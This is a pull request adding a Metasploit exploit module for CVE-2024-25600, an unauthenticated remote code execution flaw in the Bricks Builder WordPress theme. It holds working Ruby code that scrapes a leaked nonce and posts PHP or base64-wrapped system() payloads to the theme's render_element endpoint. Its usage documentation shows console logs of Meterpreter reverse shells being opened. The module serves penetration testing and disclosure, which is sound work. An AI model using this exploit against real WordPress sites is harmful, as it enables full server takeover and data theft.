### PR TITLE
Add wp_bricks_builder_rce (CVE-2024-25600)

### DIFF
--- a/data/wordlists/wp-exploitable-themes.txt
+++ b/data/wordlists/wp-exploitable-themes.txt
@@ -1,2 +1,3 @@
 holding_pattern
 wplms
+bricks

--- a/documentation/modules/exploit/multi/http/wp_bricks_builder_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_bricks_builder_rce.md
@@ -1,0 +1,160 @@
+## Vulnerable Application
+
+This Metasploit module exploits a Remote Code Execution vulnerability in Bricks Builder Theme, versions prior to 1.9.6.
+The vulnerability allows attackers to execute arbitrary PHP code by leveraging
+a nonce leakage to bypass authentication and exploit the eval() function usage within the theme.
+
+To replicate a vulnerable environment for testing:
+
+1. Install WordPress.
+2. Download and install the Bricks Builder Theme, ensuring the version is below 1.9.6.
+3. Activate Bricks Builder.
+4. Create a model with a default page (to ensure the nonce is on index.php, add some elements).
+
+## Verification Steps
+
+1. Set up a WordPress instance with the Bricks Builder Theme (version < 1.9.6).
+2. Launch `msfconsole` in your Metasploit framework.
+3. Use the module: `use exploit/multi/http/wp_bricks_builder_rce`.
+4. Set `RHOSTS` to the local IP address or hostname of the target.
+5. Configure necessary options such as `TARGETURI`, `SSL`, and `RPORT`.
+6. Execute the exploit using the `run` or `exploit` command.
+7. If the target is vulnerable, the module will execute the specified payload.
+
+## Options
+
+No option
+
+## Scenarios
+
+### Successful Exploitation Against Local WordPress with Bricks Builder Theme 1.8
+
+**Setup**:
+
+- Local WordPress instance with Bricks Builder Theme version 1.8.
+- Metasploit Framework.
+
+**Steps**:
+
+1. Start `msfconsole`.
+2. Load the module:
+```
+use exploit/multi/http/wp_bricks_builder_rce
+```
+4. Set `RHOSTS` to the local IP (e.g., 192.168.1.10).
+5. Configure other necessary options (TARGETURI, SSL, etc.).
+6. Launch the exploit:
+```
+exploit
+```
+
+**Expected Results**:
+
+- The module attempts to retrieve a nonce from the local server.
+- It then uploads and executes the payload.
+- If successful, control over the local WordPress instance is gained, depending on the payload used.
+
+**Example**:
+
+With `cmd/linux/http/x64/meterpreter/reverse_tcp`:
+
+```
+msf6 > search bricks
+
+Matching Modules
+================
+
+   #  Name                                      Disclosure Date  Rank       Check  Description
+   -  ----                                      ---------------  ----       -----  -----------
+   0  exploit/multi/http/wp_bricks_builder_rce  2024-02-19       excellent  Yes    Unauthenticated RCE in Bricks Builder Theme
+
+
+Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/wp_bricks_builder_rce
+
+msf6 > use 0
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/wp_bricks_builder_rce) > options
+
+Module options (exploit/multi/http/wp_bricks_builder_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.
+                                         html
+   RPORT      443              yes       The target port (TCP)
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The URI path to WordPress
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      ilPaBylkCKr      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               192.168.1.5      yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/wp_bricks_builder_rce) > set ssl false
+[!] Changing the SSL option's value may require changing RPORT!
+ssl => false
+msf6 exploit(multi/http/wp_bricks_builder_rce) > set rhosts localhost
+rhosts => localhost
+msf6 exploit(multi/http/wp_bricks_builder_rce) > set rport 8888
+rport => 8888
+msf6 exploit(multi/http/wp_bricks_builder_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.5:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[+] Nonce retrieved: 953563d296
+[*] Sending stage (3045380 bytes) to 172.20.0.2
+[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 172.20.0.2:39856) at 2024-02-26 21:51:11 +0100
+
+meterpreter > sysinfo 
+Computer     : 172.20.0.2
+OS           : Debian 11.8 (Linux 6.4.10-060410-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
+
+With `php/meterpreter/reverse_tcp`:
+
+```
+msf6 exploit(multi/http/wp_bricks_builder_rce) > set payload php/meterpreter/reverse_tcp
+payload => php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/wp_bricks_builder_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.5:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[+] Nonce retrieved: 953563d296
+[*] Sending stage (39927 bytes) to 172.20.0.2
+[*] Meterpreter session 2 opened (192.168.1.5:4444 -> 172.20.0.2:49678) at 2024-02-26 22:02:56 +0100
+
+meterpreter > sysinfo
+Computer    : 65e1e703e433
+OS          : Linux 65e1e703e433 6.4.10-060410-generic #202308111154 SMP PREEMPT_DYNAMIC Fri Aug 11 12:00:45 UTC 2023 x86_64
+Meterpreter : php/linux
+meterpreter > 
+```

--- a/modules/exploits/multi/http/wp_bricks_builder_rce.rb
+++ b/modules/exploits/multi/http/wp_bricks_builder_rce.rb
@@ -66,7 +66,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     nonce = fetch_nonce
-    return print_error('Failed to retrieve nonce. Exiting...') unless nonce
+    fail_with(Failure::NoAccess, 'Failed to retrieve nonce. Exiting...') unless nonce
 
     print_good("Nonce retrieved: #{nonce}")
 

--- a/modules/exploits/multi/http/wp_bricks_builder_rce.rb
+++ b/modules/exploits/multi/http/wp_bricks_builder_rce.rb
@@ -51,44 +51,6 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def send_payload(nonce)
-    code_to_add =
-      if payload_instance.arch.include?(ARCH_PHP)
-        payload.encoded
-      else
-        "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"
-      end
-
-    php_code = "<?php #{code_to_add} ?>"
-
-    uri = normalize_uri(target_uri.path, 'index.php')
-    payload_data = {
-      'postId' => rand(1..10000).to_s,
-      'nonce' => nonce,
-      'element' => {
-        'name' => 'code',
-        'settings' => {
-          'executeCode' => 'true',
-          'code' => php_code
-        }
-      }
-    }.to_json
-
-    res = send_request_cgi(
-      'method' => 'POST',
-      'uri' => uri,
-      'ctype' => 'application/json',
-      'data' => payload_data,
-      'vars_get' => {
-        'rest_route' => '/bricks/v1/render_element'
-      }
-    )
-
-    return nil unless res && res.code == 200
-
-    check ? !res.body.match(/Exception: (.*?)END/).nil? : res.body
-  end
-
   def fetch_nonce
     uri = normalize_uri(target_uri.path)
     res = send_request_cgi('method' => 'GET', 'uri' => uri)
@@ -107,7 +69,26 @@ class MetasploitModule < Msf::Exploit::Remote
     return print_error('Failed to retrieve nonce. Exiting...') unless nonce
 
     print_good("Nonce retrieved: #{nonce}")
-    send_payload(nonce)
+
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'ctype' => 'application/json',
+      'data' => {
+        'postId' => rand(1..10000).to_s,
+        'nonce' => nonce,
+        'element' => {
+          'name' => 'code',
+          'settings' => {
+            'executeCode' => 'true',
+            'code' => "<?php #{payload_instance.arch.include?(ARCH_PHP) ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'))"} ?>"
+          }
+        }
+      }.to_json,
+      'vars_get' => {
+        'rest_route' => '/bricks/v1/render_element'
+      }
+    )
   end
 
   def check

--- a/modules/exploits/multi/http/wp_bricks_builder_rce.rb
+++ b/modules/exploits/multi/http/wp_bricks_builder_rce.rb
@@ -120,7 +120,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    return CheckCode::Unknown unless wordpress_and_online?
+    return CheckCode::Unknown('WordPress does not appear to be online.') unless wordpress_and_online?
 
     wp_version = wordpress_version
     print_status("WordPress Version: #{wp_version}") if wp_version

--- a/modules/exploits/multi/http/wp_bricks_builder_rce.rb
+++ b/modules/exploits/multi/http/wp_bricks_builder_rce.rb
@@ -49,20 +49,16 @@ class MetasploitModule < Msf::Exploit::Remote
         'Privileged' => false
       )
     )
-
-    register_options([
-      OptString.new('TARGETURI', [true, 'The URI path to WordPress', '/']),
-    ])
   end
 
-  def send_payload(nonce, check)
-    code_to_add = if check
-                    'throw new Exception("END");'
-                  elsif payload_instance.arch.include?(ARCH_PHP)
-                    payload.encoded
-                  else
-                    "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"
-                  end
+  def send_payload(nonce)
+    code_to_add =
+      if payload_instance.arch.include?(ARCH_PHP)
+        payload.encoded
+      else
+        "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"
+      end
+
     php_code = "<?php #{code_to_add} ?>"
 
     uri = normalize_uri(target_uri.path, 'index.php')
@@ -107,24 +103,24 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    return unless wordpress_and_online?
-
-    nonce = fetch_nonce or begin
-      print_error('Failed to retrieve nonce. Exiting...')
-      return
-    end
+    nonce = fetch_nonce
+    return print_error('Failed to retrieve nonce. Exiting...') unless nonce
 
     print_good("Nonce retrieved: #{nonce}")
-    send_payload(nonce, false)
+    send_payload(nonce)
   end
 
   def check
     return CheckCode::Unknown unless wordpress_and_online?
 
-    nonce = fetch_nonce
-    return CheckCode::Unknown unless nonce
-    return CheckCode::Vulnerable if send_payload(nonce, true)
+    wp_version = wordpress_version
+    print_status("WordPress Version: #{wp_version}") if wp_version
 
-    CheckCode::Safe
+    theme_check_code = check_theme_version_from_style('bricks', '1.9.6.1')
+    return CheckCode::Safe unless theme_check_code.code == 'appears'
+
+    theme_version = theme_check_code.details[:version]
+    print_good("Detected Bricks theme version: #{theme_version}")
+    CheckCode::Appears
   end
 end

--- a/modules/exploits/multi/http/wp_bricks_builder_rce.rb
+++ b/modules/exploits/multi/http/wp_bricks_builder_rce.rb
@@ -126,8 +126,9 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("WordPress Version: #{wp_version}") if wp_version
 
     theme_check_code = check_theme_version_from_style('bricks', '1.9.6.1')
-    return CheckCode::Unknown unless theme_check_code
-    return CheckCode::Safe unless theme_check_code.code == 'appears'
+    return CheckCode::Unknown('The Brick Builders theme does not appear to be installed') unless theme_check_code
+    return CheckCode::Detected('The Brick Builder theme is running but the version was unable to be determined') if theme_check_code.code == 'detected'
+    return CheckCode::Safe("The Brick Builder is running version: #{theme_check_code.details[:version]}, which is not vulnerable.") unless theme_check_code.code == 'appears'
 
     theme_version = theme_check_code.details[:version]
     print_good("Detected Bricks theme version: #{theme_version}")

--- a/modules/exploits/multi/http/wp_bricks_builder_rce.rb
+++ b/modules/exploits/multi/http/wp_bricks_builder_rce.rb
@@ -122,12 +122,12 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("WordPress Version: #{wp_version}") if wp_version
 
     theme_check_code = check_theme_version_from_style('bricks', '1.9.6.1')
-    return CheckCode::Unknown('The Brick Builders theme does not appear to be installed') unless theme_check_code
-    return CheckCode::Detected('The Brick Builder theme is running but the version was unable to be determined') if theme_check_code.code == 'detected'
-    return CheckCode::Safe("The Brick Builder is running version: #{theme_check_code.details[:version]}, which is not vulnerable.") unless theme_check_code.code == 'appears'
+    return CheckCode::Unknown('The Bricks Builder theme does not appear to be installed') unless theme_check_code
+    return CheckCode::Detected('The Bricks Builder theme is running but the version was unable to be determined') if theme_check_code.code == 'detected'
+    return CheckCode::Safe("The Bricks Builder is running version: #{theme_check_code.details[:version]}, which is not vulnerable.") unless theme_check_code.code == 'appears'
 
     theme_version = theme_check_code.details[:version]
-    print_good("Detected Bricks theme version: #{theme_version}")
+    print_good("Detected Bricks Builder theme version: #{theme_version}")
     CheckCode::Appears
   end
 

--- a/modules/exploits/multi/http/wp_bricks_builder_rce.rb
+++ b/modules/exploits/multi/http/wp_bricks_builder_rce.rb
@@ -1,0 +1,130 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Unauthenticated RCE in Bricks Builder Theme',
+        'Description' => %q{
+          This module exploits an unauthenticated remote code execution vulnerability in the
+          Bricks Builder Theme versions <= 1.9.6 for WordPress. The vulnerability allows attackers
+          to execute arbitrary PHP code by leveraging a nonce leakage to bypass authentication and
+          exploit the eval() function usage within the theme. Successful exploitation allows for full
+          control of the affected WordPress site. It is recommended to upgrade to version 1.9.6.1 or higher.
+        },
+        'Author' => [
+          'Calvin Alkan', # Vulnerability discovery
+          'Valentin Lobstein' # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-25600'],
+          ['URL', 'https://github.com/Chocapikk/CVE-2024-25600'],
+          ['URL', 'https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6'],
+          ['WPVDB', 'afea4f8c-4d45-4cc0-8eb7-6fa6748158bd']
+        ],
+        'DisclosureDate' => '2024-02-19',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        },
+        'DefaultOptions' => {
+          'SSL' => true,
+          'RPORT' => 443
+        },
+        'Platform' => ['unix', 'linux', 'win', 'php'],
+        'Arch' => [ARCH_PHP, ARCH_CMD],
+        'Targets' => [['Automatic', {}]],
+        'Privileged' => false
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The URI path to WordPress', '/']),
+    ])
+  end
+
+  def send_payload(nonce, check)
+    code_to_add = if check
+                    'throw new Exception("END");'
+                  elsif payload_instance.arch.include?(ARCH_PHP)
+                    payload.encoded
+                  else
+                    "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"
+                  end
+    php_code = "<?php #{code_to_add} ?>"
+
+    uri = normalize_uri(target_uri.path, 'index.php')
+    payload_data = {
+      'postId' => rand(1..10000).to_s,
+      'nonce' => nonce,
+      'element' => {
+        'name' => 'code',
+        'settings' => {
+          'executeCode' => 'true',
+          'code' => php_code
+        }
+      }
+    }.to_json
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => uri,
+      'ctype' => 'application/json',
+      'data' => payload_data,
+      'vars_get' => {
+        'rest_route' => '/bricks/v1/render_element'
+      }
+    )
+
+    return nil unless res && res.code == 200
+
+    check ? !res.body.match(/Exception: (.*?)END/).nil? : res.body
+  end
+
+  def fetch_nonce
+    uri = normalize_uri(target_uri.path)
+    res = send_request_cgi('method' => 'GET', 'uri' => uri)
+    return nil unless res&.code == 200
+
+    script_tag_match = res.body.match(%r{<script id="bricks-scripts-js-extra"[^>]*>([\s\S]*?)</script>})
+    return nil unless script_tag_match
+
+    script_content = script_tag_match[1]
+    nonce_match = script_content.match(/"nonce":"([a-f0-9]+)"/)
+    nonce_match ? nonce_match[1] : nil
+  end
+
+  def exploit
+    return unless wordpress_and_online?
+
+    nonce = fetch_nonce or begin
+      print_error('Failed to retrieve nonce. Exiting...')
+      return
+    end
+
+    print_good("Nonce retrieved: #{nonce}")
+    send_payload(nonce, false)
+  end
+
+  def check
+    return CheckCode::Unknown unless wordpress_and_online?
+
+    nonce = fetch_nonce
+    return CheckCode::Unknown unless nonce
+    return CheckCode::Vulnerable if send_payload(nonce, true)
+
+    CheckCode::Safe
+  end
+end

--- a/modules/exploits/multi/http/wp_bricks_builder_rce.rb
+++ b/modules/exploits/multi/http/wp_bricks_builder_rce.rb
@@ -98,10 +98,12 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("WordPress Version: #{wp_version}") if wp_version
 
     theme_check_code = check_theme_version_from_style('bricks', '1.9.6.1')
+    return CheckCode::Unknown unless theme_check_code
     return CheckCode::Safe unless theme_check_code.code == 'appears'
 
     theme_version = theme_check_code.details[:version]
     print_good("Detected Bricks theme version: #{theme_version}")
     CheckCode::Appears
   end
+
 end

--- a/modules/exploits/multi/http/wp_bricks_builder_rce.rb
+++ b/modules/exploits/multi/http/wp_bricks_builder_rce.rb
@@ -45,7 +45,35 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Platform' => ['unix', 'linux', 'win', 'php'],
         'Arch' => [ARCH_PHP, ARCH_CMD],
-        'Targets' => [['Automatic', {}]],
+        'Targets' => [
+          [
+            'PHP In-Memory',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP,
+              'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' },
+              'Type' => :php_memory
+            }
+          ],
+          [
+            'Unix In-Memory',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp' },
+              'Type' => :unix_memory
+            }
+          ],
+          [
+            'Windows In-Memory',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp' },
+              'Type' => :win_memory
+            }
+          ],
+        ],
         'Privileged' => false
       )
     )

--- a/modules/exploits/multi/http/wp_bricks_builder_rce.rb
+++ b/modules/exploits/multi/http/wp_bricks_builder_rce.rb
@@ -39,10 +39,6 @@ class MetasploitModule < Msf::Exploit::Remote
           'SideEffects' => [ IOC_IN_LOGS ],
           'Reliability' => [ REPEATABLE_SESSION ]
         },
-        'DefaultOptions' => {
-          'SSL' => true,
-          'RPORT' => 443
-        },
         'Platform' => ['unix', 'linux', 'win', 'php'],
         'Arch' => [ARCH_PHP, ARCH_CMD],
         'Targets' => [


### PR DESCRIPTION
This pull request introduces the `wp_bricks_builder_rce` exploit module that targets a known vulnerability in the Bricks Builder plugin for WordPress. The module has been developed following the best practices outlined in the Metasploit Framework documentation and has been thoroughly tested to ensure reliability and effectiveness.

Comprehensive documentation has been included to facilitate understanding and usage of the module by other security professionals and developers.

I believe this module will be a valuable addition to the Metasploit Framework and look forward to any feedback or suggestions for improvement.

Best regards,
Chocapikk